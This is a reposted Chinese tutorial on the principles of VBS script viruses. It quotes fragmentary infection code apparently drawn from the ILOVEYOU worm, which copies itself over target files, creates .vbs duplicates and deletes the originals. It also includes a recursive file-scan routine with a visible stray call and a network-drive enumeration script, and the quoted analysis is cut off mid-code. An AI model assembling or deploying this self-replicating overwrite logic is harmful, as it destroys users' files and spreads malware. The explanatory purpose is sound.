Vbs脚本病毒
描述病毒文件是如何感染正常文件的:首先将病毒自身代码赋给字符串变量vbscopy,然后将这个字符串覆盖写到目标文件,并创建一个以目标文件名为文件名前缀、vbs为后缀的文件副本,最后删除目标文件。
| 代码: |
| |
| Set fso=createobject("scripting.filesystemobject") '创建一个文件系统对象 set self=fso.opentextfile(wscript.scriptfullname,1) '读打开当前文件(即病毒本身) vbscopy=self.readall ' 读取病毒全部代码到字符串变量vbscopy…… set ap=fso.opentextfile(目标文件.path,2,true) ' 写打开目标文件,准备写入病毒代码 ap.write vbscopy ' 将病毒代码覆盖目标文件 ap.close set cop=fso.getfile(目标文件.path) '得到目标文件路径 cop.copy(目标文件.path & ".vbs") ' 创建另外一个病毒文件(以.vbs为后缀) 目标文件.delete(true) '删除目标文件 |
| |
该函数主要用来寻找满足条件的文件,并生成对应文件的一个病毒副本
| 代码: |
| |
| sub scan(folder_) on error resume next set folder_=fso.getfolder(folder_) set files=folder_.files for each file in files ext=fso.GetExtensionName(file) ext=lcase(ext) if ext="ini" then Wscript.echo (file) end if next set subfolders=folder_.subfolders for each subfolder in subfolders scan() scan(subfolder) next end sub |
| |
寻找当前打印机连接和网络共享连接并将它们显示出来的脚本程序
| 代码: |
| |
on error resume next welcome_msg = "网络连接搜索测试" Set WSHNetwork = WScript.CreateObject("WScript.Network") Set oPrinters = WshNetwork.EnumPrinterConnections WScript.Echo "Network printer mappings:" For i = 0 to oPrinters.Count-1 step 2 WScript.Echo "Port "&oPrinters.Item(i)&"="&oPrinters.Item(i+1) Next Set colDrives = WSHNetwork.EnumNetworkDrives If colDrives.Count=0 Then MsgBox "没有可列出的驱动器。",vbInformation + vbOkOnly,welcome_msg Else strMsg = "当前网络驱动器连接: " &CRLF For i=0 To colDrives.Count-1 Step 2 strMsg = strMsg&Chr(13)&colDrives(i)&colDrives(i+1) Next MsgBox strMsg, vbInformation + vbOkOnly,welcome_msg End If |
| |
| 引用: |
| |
| 二、Vbs脚本病毒原理分析 1.vbs脚本病毒如何感染、搜索文件 VBS脚本病毒一般是直接通过自我复制来感染文件的,病毒中的绝大部分代码都可以直接附加在其他同类程序的中间,譬如新欢乐时光病毒可以将自己的代码附加在.htm文件的尾部,并在顶部加入一条调用病毒代码的语句,而爱虫病毒则是直接生成一个文件的副本,将病毒代码拷入其中,并以原文件名作为病毒文件名的前缀,vbs作为后缀。下面我们通过爱虫病毒的部分代码具体分析一下这类病毒的感染和搜索原理: 以下是文件感染的部分关键代码: Set fso=createobject("scripting.filesystemobject") '创建一个文件系统对象 set self=fso.opentextfile(ws |
本文来自互联网用户投稿,文章观点仅代表作者本人,不代表本站立场,不承担相关法律责任。如若转载,请注明出处。 如若内容造成侵权/违法违规/事实不符,请点击【内容举报】进行投诉反馈!
